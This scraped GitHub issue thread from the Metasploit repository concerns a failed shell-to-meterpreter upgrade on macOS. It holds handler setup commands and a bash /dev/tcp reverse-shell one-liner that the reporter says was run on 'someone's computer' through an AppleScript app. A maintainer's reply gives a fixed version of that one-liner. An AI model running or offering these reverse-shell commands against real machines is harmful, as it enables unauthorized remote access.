Metasploit-framework: Shell to meterpreter printf error

Created on 22 May 2018  路  3Comments  路  Source: rapid7/metasploit-framework
  1. I run: use multi/handler, set payload osx/x64/shell_reverse_tcp, set LHOST 10.148.91.234, set LPORT 1235, exploit -j -z.
  2. I get a shell on someone's computer using an AppleScript application executing the code "bash -i >& /dev/tcp/10.148.91.234/1235 0>&1 2>&1"
  3. I then run:

msf exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[] Upgrading session ID: 1
[] Starting exploit/multi/handler
[] Started reverse TCP handler on 10.148.91.234:4433
[] Command stager progress: 3.14% (1700/54114 bytes)
[-] Error: Unable to execute the following command: "printf '\0\0\0\0\20\0\0\0\0\0\0\0\60\0\0\0\0\0\0\0\20\0\0\0\0\0\0\7\0\0\0\3\0\0\0\5\0\0\0\0\0\0\0\137\137\160\162\157\147\162\141\155\137\166\141\162\163\0\0\137\137\104\101\124\101\0\0\0\0\0\0\0\0\0\0\0\60\0\0\1\0\0\0\50\0\0\0\0\0\0\0\0\60\0\0\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\137\137\156\154\137\163\171\155\142\157\154\137\160\164\162\0\137\137\104\101\124\101\0\0\0\0\0\0\0\0\0\0\50\60\0\0\1\0\0\0\20\0\0\0\0\0\0\0\50\60\0\0\3\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\6\0\0\0\0\0\0\0\0\0\0\0\137\137\147\157\164\0\0\0\0\0\0\0\0\0\0\0\137\137\104\101\124\101\0\0\0\0\0\0\0\0\0\0\70\60\0\0\1\0\0\0\10\0\0\0\0\0\0\0\70\60\0\0\3\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\10\0\0\0\0\0\0\0\0\0\0\0\137\137\154\141\137\163\171\155\142\157\154\137\160\164\162\0\137\137\104\101\124\101\0\0\0\0\0\0\0\0\0\0\100\60\0\0\1\0\0\0\60\0\0\0\0\0\0\0\100\60\0\0\3\0\0\0\0\0\0\0\0\0\0\0\7\0\0\0\11\0\0\0\0\0\0\0\0\0\0\0\137\137\143\157\155\155\157\156\0\0\0\0\0\0\0\0\137\137\104\101\124\101\0\0\0\0\0\0\0\0\0\0\160\60\0\0\1\0\0\0\40\0\0\0\0\0\0\0\0\0\0\0\3\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\31\0\0\0\110\0\0\0\137\137\114\111\116\113\105\104\111\124\0\0\0\0\0\0\0\100\0\0\1\0\0\0\0\20\0\0\0\0\0\0\0\100\0\0\0\0\0\0\64\3\0\0\0\0\0\0\7\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\42\0\0\200\60\0\0\0\0\100\0\0\10\0\0\0\10\100\0\0\70\0\0\0\0\0\0\0\0\0\0\0\100\100\0\0\140\0\0\0\240\100\0\0\170\0\0\0\2\0\0\0\30\0\0\0\40\101\0\0\21\0\0\0\154\102\0\0\310\0\0\0\13\0\0\0\120\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\7\0\0\0\11\0\0\0\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\60\102\0\0\17\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\16\0\0\0\40\0\0\0\14\0\0\0\57\165\163\162\57\154\151\142\57\144\171'>>/tmp/LDYya"
[-] Output: "bash-3.2$"
[*] Stopping exploit/multi/handler

It should upgrade the shell to a meterpreter session

Instead it has that printf error and doesn't create a new meterpreter session

Metasploit version:

Framework: 4.16.57-dev-a7817564eac02767f107349c8426d67a3eba00cd
Console : 4.16.57-dev-a7817564eac02767f107349c8426d67a3eba00cd

I installed metasploit using the latest OSX nightly installer

I am running metasploit on Mac OS Sierra 10.12.6

bug osx
Source
picture Acidical

All 3 comments

for some reason the bash -i is breaking stager.
As a workaround you can simply remove -i, e.g:
bash >& /dev/tcp/10.148.91.234/1235 0>&1 2>&1

timwr picture timwr on 23 May 2018
👍1

For some reason shell_to_meterpreter is treating any return value from cmd_exec as an error (including the bash-3.2$ prompt on an interactive shell:
https://github.com/rapid7/metasploit-framework/blob/master/modules/post/multi/manage/shell_to_meterpreter.rb#L239

timwr picture timwr on 23 May 2018
👍1

Thank you so much. It worked. It's weird though because one day it worked and another it didn't. Someone must have changed something.

Acidical picture Acidical on 24 May 2018
Was this page helpful?
0 / 5 - 0 ratings

Related issues

mdisec picture mdisec  路  3Comments
bugshere picture bugshere  路  3Comments
bcoles picture bcoles  路  3Comments
Sonya2010 picture Sonya2010  路  3Comments
XSecr3t picture XSecr3t  路  3Comments